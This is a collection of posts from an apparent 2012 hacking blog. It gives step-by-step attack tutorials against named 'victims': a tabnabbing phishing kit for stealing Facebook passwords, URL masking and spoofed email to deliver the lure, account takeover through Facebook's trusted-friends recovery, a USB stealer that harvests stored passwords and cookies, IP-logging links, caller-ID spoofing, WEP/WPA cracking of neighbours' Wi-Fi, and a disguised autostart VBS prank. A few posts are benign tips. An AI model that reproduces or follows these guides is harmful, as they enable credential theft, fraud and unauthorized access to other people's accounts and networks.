Amazon

Wednesday, December 26, 2012

How to Hack Facebook Account Password Using Tabnabbing (New Phishing Method)




 
Hello Friends today i am going to explain you How To Hack Facebook Account Password using Tabnabbing method. Tabnabbing is a modern type of phishing method used to hack websites passwords. As we all know normal Phishing attack is easily detectable on many site such as Facebook,Gmail, yahoo etc.

Like Facebook has implemented an extra code that validates the previous arriving URL and some basic functions. If it founds that page from which you arrived is a Facebook Phish or fake page, it displays a warning message to user that You have been arrived from fraudulent or fake page. So please change you Facebook account password immediately. So Victim easily came to know that was made fool by someone and he changes his account password again.

For more information about Tabnabbing and how to How to protect yourself from Tabnabbing refer the Last post.

How to Hack Facebook Account Password Using Tabnabbing:

1. Free Download Facebook Phisher package to hack Facebook Password.

    Password:  hackerslife
 
 Extract the folder " TabnabbingbyHackersLife "
It will contain four files :
a. Facebook.html (Fake Facebook login page)
b. login.php (Script which captures the login details of the victim
b. google.html (Standard google page used to trick the user)
c. tabnabb (Java script which is required for tabnabbing)

3. Now, to any anonymous webhost (any u like), upload this files Facebook.html ,Login.php and Google.html. You can use my3gb.com, 110mb.com or freewebhost.com for this as they are free.

4. Now open tabnabb.js using a notepad , Search for "Enter your URL here" , Now replace it with your "Facebook.html" url which you uploaded in the previous step, finally save it and upload tabnabb.js to your hosting account.

5. After successfull upload, Check whether the hack is working, click on the google.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake Facebook page.

6. To make url (name.webhost.com/index.html) short read this Previous article "How To Hide a Url | Change Url | Mask Url".

7. Now read this Article about How To Send Anonymous Email

8. Now, send google.html page to victim inbox of which u want to hack Facebook account password.

9. When, he will login with this facebook phisher to his facebook account, a new file "log.txt" will be created which will contain facebook hacked password in plain text form and he will be redirected to Facebook.com/careers page to avoid suspecion.

Thats it now you can hack Facebook account passwords using this Facebook hacking new technique Tabnabbing. If you have any problem in using this Facebook Phisher to hack Facebook account password, mention it in comments..
Happy Hacking.. :)


How to hide a url | Chnage URL | Mask url Easily


"How to hide a url | Chnage URL | Mask url" .While sending mail, you have to include in mail, the link to your phisher page. So, instead of sending mail with actual url which can create a sense of doubt in victim's mind, we can hide the url. Dot.tk is an online service which enables you to
hide/mask the url.

 




Hide/Mask a url:

Consider you have hosted your phisher page and your phisher link is something like:

www.hackerslifebygaurav.blogspot.in/

So, whenever victim checks out this link, he will find the link suspicious. This can be detrimental for our hack. So, the best way is to make this link less suspicious i.e. to hide/mask the url.

1. So, go to Here to hide a url. You can Also Use this..Adf.ly

2. Enter your phisher link in the textbox and hit on Next.

3. Enter the link you want to rename your phisher link to dot.tk domain name.

4. Now, you can send this masked phisher link to your victim. The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain.

So friends, I hope you are now able to hide a url using this url masker service.If you have any problem in this tutorial just comment here.

Happy hacking.. :)

How To Send Anonymous E-Mails - Fake Mailer

As we all know, Phishing is one of the most useful and simple methods for hacking email accounts. While phishing anyone's email account, you need to send the victim an email containing the link to your phisher page. The victim will click on this link only if he finds the mail genuine. So, we can use Fake mailer
to make this mail appear genuine.


How to send anonymous email:

In the below post, I have posted a Fake Mailer which is useful to send anonymous email to your victim.

Fake Mailer to send anonymous Email:

1. Go to Fake Mailer website to send anonymous email.


2. Now, enter the information as shown:

From Name: The Sender name which will appear on Email
From Email: The sender Email address
To: Victim email address
Subject: Subject of the Email
Content-type: Select text/html
Text: The content of your mail. Put something which will make your victim to click on your phisher link.

3. Now, enter captcha and hit on Send.

4. Your victim will receive mail like this:



So friends, I guess this Fake Mailer is pretty easy to use and also very handy to send anonymous email to your friend or victim.
Happy Hacking.. :)

Tuesday, December 25, 2012

How To Bypass Windows 8 Password Screen



If you’re not worried about unauthorized access in your windows 8 system and don’t want to enter a Microsoft account password every time you boot your windows 8, you can bypass the windows 8 password screen.
1. Hold down the Windows key and then tap X (Win -x ) and click on Command Prompt (Admin)



2. In command prompt window type
control userpasswords2
then press ENTER



3. After that will appear User Accounts dialog where you need to uncheck the box marked Users must enter a user name and password to use this computer.



4. Click on Apply , then confirm the automatic sign-in option by entering your password twice.



5. Reboot your PC

Thursday, December 13, 2012

Balance Transfer Trick For All Mobile Networks

Here Are Working Balance Transfer Tricks For All Mobile Networks.


Airtel Balance Transfer : 


To Transfer Balance In Airtel Just Dial *141# And Follow The Onscreen Instructions.

You Can Transfer From 5 To 30 Rupees Of Balance In Airtel.

 


Tata Docomo Balance Transfer  :


To Transfer Balance In Tata Docomo SMS as BT MobileNumber Amount And Send It To 54321.

E.g. BT 9876543210 30 To Transfer 30 Rupees Of Balance.




Idea Balance Transfer :



To Transfer Balance In !dea Network Send SMS as GIVE MobileNumber Amount And Send It To 55567.

E.g. GIVE 9876543210 30 To Transfer 30 Rupees.




Vodafone Balance Transfer  :


To Transfer Balance In Vodafone Dial *131*Amount*Mobile No#

E.g. *131*50*9876543210# To Transfer 50 Rupees Of Balance.




Uninor Balance Transfer :


To Transfer Balance In Uninor Just Dial *202*MobileNumber*Amount#

E.g. *202*9876543210*30# To Transfer 30 Rupees.




Aircel Balance Transfer :


To Transfer Balance In Aircel Just Dial *122*666# And Follow The Instructions.

You Can Transfer 10,20 Or 100 Rupees Of Balance.




BSNL Balance Transfer  :


To Transfer Balance In BSNL Just Send SMS GIFT MobileNumber Amount To 53733.

E.g. GIFT 9876543210 50 To Transfer 50 Rupees Of Balance.





That’s All. If You Need Any Help Or Have Any Suggestion Just Comment Below.

Friday, September 28, 2012

CD drive hack

Here i will show you a basic VBS script that opens a cd drive every time found closed. so ultimately always opens CD drive till closed just copy paste this code into Notepad (any basic ANSI standard text editor) and save as CDfun.vbs and dont forget the .vbs part


set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()


now this is funny but what if it was even funnier. what if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.

How to stop This Thing???
open
task Manager > processes> wscript.exe
right click on it > end process tree.

done

cheers.......

Wednesday, August 22, 2012

HACK IP ADDRESS OF ANOTHER COMPUTER.

  • Download the PHP notify script and extract files. 
  • Now you will get two files IP.html and index.php .
  • You need to upload these two files to any free web hosting server. 
  • Go on "Sign up" at the right do not choose domain choose "Sub Domain" and give name what ever you want fill all boxes with correct information.
  • then go on members area  and log in to your account then go to Cpanel and then scroll down and go to file manager   and upload extracted file in "Public html".
  • Now you will need to send the link of index.php to the victim whose IP you want to get.
  • The link will be your sub domain www.yoursubdomain.com/index.php.
  • You can not send this link on facebook you will need to shorten your subdomain you can shorten your sub domain on goo.gl and then send that shorten URL to your victim whose ip you want to get.
  • when Victim will click on your shorten URL you will get victims IP in Ip.html.

Monday, August 20, 2012

Hack Facebook Account



Hence we know that there are many techniques for Facebook Account hacking like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.
For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

After success full addition of your fake accounts into victims account as friends follow the below steps .:

1. Go to Facebook and click Forgot your Password ?



2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.



3. After entering everything check it again and click on search.


4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying
No Longer Access to These click that one.


5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.


6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.


7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Note: This trick only works if 3 trusted friends agree to give you the security code so its really important that you add your 3 fake accounts into your victims facebook account as a friend.

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Hack Email Account Password Using USB Thief

Wouldn't it be nice if you just plug in your USB drive on victim computer and all victim's stored passwords are automatically saved in text format in your USB drive without victim knowledge??? Yes, this is what our free password hacking software - USB Thief does. Whenever you connect USB drive to any computer, all the stored passwords, history, license keys and other confidential data is hacked, thanks to this password hacking software. I have provided link for USB Thief software download...
 just read on.
USB Thief- Password Hacking software:-

USB Thief is a type of portable stealer software used to hack all locally stored passwords on victim computer. A password is locally stored if the victim hits "Remember Me" while logging in to his account. USB Thief steals following information: -

- Visited Links List
- Internet Explorer Cache List
- Internet Explorer Passwords List
- Instant Messengers Accounts List
- Installed Windows Updates List
- Mozilla Cache List
- Cookies List
- Mozilla History List
- Instant Messengers Accounts List
- Search Queries List
- Adapters Report
- Network Passwords List
- TCP/UDP Ports List
- Product Key List
- Protected Storage Passwords List
- PST Passwords List
- Startup Programs List
- Video Cache List

How to use USB Thief as password hacking software:

1. Free Download USB Thief to hack victim passwords.
Password: hackerslife

2. Unzip the file. Connect USB drive to your computer. Format it.

3. In downloaded file, go to: "USB Thief Modified by TRICKS4INDYA" folder -> "Copy" folder and copy all the files in "Copy" folder. Paste all the files in USB drive.

Note: Don't copy the folder, copy files in the folder (I hope you've got the point).

4. Now, in USB drive, hit on "hideh.bat" file which makes all the files in USB drive hidden. Delete "hideh.bat" file.


 
5. Move on to victim computer and plug in the USB. Open the USB drive on victim computer and wait for 8-10 seconds. Safely remove the USB from victim computer. All the victim passwords are thus, now captured in our USB drive.

6. Now, to see these passwords, copy "showh.bat" file from the downloaded files. Paste this file in your USB drive and run it in USB. Now refresh. You will be able to see all the hidden files.



7. Open "IMNeoWorld" folder which will contain all hacked passwords and license keys

Note: I have tried this USB Thief, but sometimes, it does not appear to steal any passwords. This USB Thief is stealing all other data.

Try out this USB Thief to hack victim stored passwords. This password hacking software is really useful if you have physical access to victim computer. If you have any problem in using this USB Thief as password hacking software, please mention it in comments.

Enjoy USB Thief as password hacking software...

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

If u like then ple follow my blog & also help to promote. Don’t forget to leave comment
  








IP Hack: How to find someone IP Address | IP Address Finder

When u wants to hack then, the first stage is, of course is collecting information about the victim. This stage mainly starts with to finding IP Address of the victim, so that you can continue next steps to hack. To finding IP Address you used software’s like Port scanning, NetBIOS, …etc.


But below is so simple tricks to find someone IP Address using IP Address Finder  :-

IP Hack - How to find someone’s IP Address:-

1. Go to IP Address Finder website to find someone's IP Address.

2. Enter your email id where you want to receive the victim's IP Address and hit on Get Link.
 
 
3. Now, you will get a link from IP Address Finder.

 
4. Send this link to your victim and whenever he will simply click on this sent link, his IP Address will be recorded and mailed to you by IP Address Finder.
Thus, this is so simple. You can easily find someone's IP Address using this IP Address Finder tool.

So far, this is the simplest method used to find someone's IP Address. This IP hack doesn't require any technical knowledge or any skills.

Got problems with this Free IP Address Finder tool??? Unable to find someone's IP Address using this IP hack??? Share your reactions in comments. I am always there to help you.

Enjoy IP Address Finder to find someone's IP Address...


Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.
 
If u like then plz follow my blog & also help to promote. Don’t forget to leave comment.







Sunday, August 19, 2012

HOW TO ACCESS BLOCKED WEBSITES.

This summary is not available. Please click here to view the post.

Download Hackers Toolbar

The toolbar for hackers is launched to make the ethical hackers to defend easily against cyber attacks.
Now get the security and hacking techniques more faster and hack much smartly...:)

This Toolbar Is All About The Hacker's Need And Security Researchers. All The Linked Tabs Are Beneficial For Ethical Hackers And Security Experts.

It's helpful and easy to install.



Click The Following Button To Download:



Saturday, August 18, 2012

Call Anyone With Any Number OR Call Anonymous (Caller Id Spoofing).

Call any one with any number.


1)   Click Here To Visit Crazy Call


2)  Select your Country ,
      Than Enter any number you wanna display on Victims phone ,
      Finally Enter the Number you Want to call.


3)  Click On GET ME A CODE . 
      After Clicking You will get the number to dial at right -hand side with Code.


4)  Dial That Number on your phone 
      And when it asks for Code just type it in your phone.
      That's Sit Your Call gets Connected.




NOTE :- INTERNATIONAL CALL RATES APPLY.



=====================================


Anonymous Calling


1)   Click Here To Visit Mobivox


2)  Register at Mobivox , 
      After Registration Completes Confirm your Mobivox Account 
      at Your Registered Email.


3)  Login at Your Mobivox Account and Click Direct WEBCALL .

Protect Your Folder From Anyone without any Software..!!! (Even Admin)

Guys, this is a trick in your PC to Prohibit any user (Even Admin OR YOURSELF) to access your Folder....
Because not everyone knows this trick.


We'll lock the folder from all the users...
Even your Self, Because we know that not every time though we are admin and we have our personal account....!!!


So, We will prohibit that folder from everone... Even Ourselves. Don't worry we will Unlock them too .







WARNING: It's better to try on non-usable OR NEW FOLDERS first for newbies 




Trick Steps:


1) Go to My Computer  > Tools  >  Folder Options  >  View  >


There is last option called "Use Simple File Sharing (Recommended)". 
Remove check from it.... then click "OK".








2) Go to that Folder which you want to secure (remove access) , and then right-click  on it and click Properties.


3) Go to tab "Security". There are listed "User Names" who can access that folder as written under: "Group OR Usernames"







4) Now, Click on advanced >
remove Check from....
"Inherit from Parent the permissions entries that apply..................."
> Click "Remove."


5) Click OK.







Now, try to access that folder, you will not be able to access it....



Back to Normal:


1) Just Go to Property > Security > Advanced >
& check that option again of
"Inherit from Parent the permissions entries that apply..................."


2) Click OK. Now you should able to access your folder again..







OR you can also add your users only from Property > Security > Advanced > Add > Advanced > Find now > "Select User"....

Monday, May 21, 2012

Wifi WPA WEP Wireless Hacking Using Back Track 5 (Final Tutorial)

INTRODUCTION


Hello and welcome to my tutorial about wireless networking. 


Today I'll be teaching you how easy it is to obtain access to a wireless protected network. 


There are lots of questions coming from the beginners on how to crack WEP/WPA/WPA2 keys and accessing their neighbor's connection. The purpose of this tutorial is to answer them. 


Judging from the "tutorials" on youtube which are either obsolete, or simply misguiding the listeners, this tutorial will be different. 


I will be covering all of the aspects and ways of hacking a network and gaining access to the router.


This tutorial will be divided in 2 parts, such as WEP and WPA/WPA2 hacking. Please read below on what you need to succeed.









What you need for this crack are a few simple things, a copy of backtrack 5 booting off a DVD or a flash drive and a compatible wireless card that supports packet injection. 


Now if you can't get to this screen, and you are stuck at the terminal you get when booting into backtrack, you need to type startx and wait a couple of minutes for the desktop to show. 


Okay so let's begin, so first we need to open a terminal. To do that, just click the little icon that's on the right side from System. Please see the image below:



Now type airmon-ng and that command displays our interfaces. In my case I have wlan0, and now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.




Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.





Now we are going to set it to lock on a specific network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack --bssid (bssid of the network) mon0. Replace (channel) with the channel of the network you are trying to crack, and replace (bssid of the network) with the bssid of the network you want to crack.


Okay so as you can probably see the data is going really slow, and we need to boost that up. We are going to need a lot more data, so let's preform one of the aireplay commands that will boost that data. Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where (bssid) is the bssid of the network. Now if your wi-fi card is supported, you should see Association successful :-), if you don't see that then your card is not supported.




Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.




Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying to crack it. So let's type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don't forget to add that asterisk after the file and the extension which is .cap.


And now it will attempt to crack the password. Just wait a couple of minutes for it to complete, and once it did it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X's will be random numbers and/or letters. That's not it, now to connect you will need to remove the semicolumns. For an example, if we were to have 12:34:52:66:59, the password would be 1232526659. Just log in to your Windows OS, and connect using that password.


================================================================================================








So lets begin. What you will need for this crack is a dictionary file that we are going to use to crack the WPA/WPA2 password. 

Remember, the bigger the dictionary file is the greater the chance you have in cracking the password. 

So now you are probably wondering, where do I get a dictionary file? Well, I don't know if this is allowed or not but I recently downloaded a 1.9GB dictionary file. 

To get the file please PM me, I can't risk getting this tutorial taken down. 

Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces. 


In my case I have wlan0, and now we are going to put it into monitor mode. 


To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.



Lets type in airodump-ng mon0 and this command is going to initiate the scanning process for Wi-Fi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I'm going to attempt to crack the network under the essid SKIDHАCKER. Take a note of the channel, and you want to copy the BSSID for later use.


Now we are going to type in airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don't forget to remember what filename you chose, because we are going to need that at the end.





What is needed to crack a WPA or WPA2 key is something called a WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake. This means, if there is no one on the network, you can't get a handshake, and you can't crack the WPA network. So how do we know if someone is connected? Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.





Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp. Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in aireplay-ng -1 0 -a (bssid) mon0. replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don't run the aireplay command a couple of times.




So now that we have a wpa handshake file, we are going to attempt to crack it. Lets stop the scan by pressing CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded. This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it's directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.





If the password is in the wordlist, it will give you a success message and the key in brackets. 
             Happy hacking, hackers!






airmon-ng
This command displays the wireless interfaces.


airmon-ng start wlan0
This command starts monitoring mode on a wi-fi device.


airodump-ng mon0
This command shows all of the wi-fi networks online.


airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
This command specifies the wi-fi device to concentrate to one network.


aireplay-ng -1 0 -a (bssid) mon0
This command kicks off clients that are connected, and gets the handshake.


aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
This command boosts the data, when cracking WEP.


aircrack-ng -w (dictionary) (wpa handshake)
This command is used when cracking WPA or WPA2 networks.


aircrack-ng (filename)*.cap
This command is used when cracking WEP networks.




These were the commands I used in the whole guide.

How To Hack App Lock In Any Android Phone

App Lock is one of the most useful application on Android. Since it came into App Store, it became must and should application in ...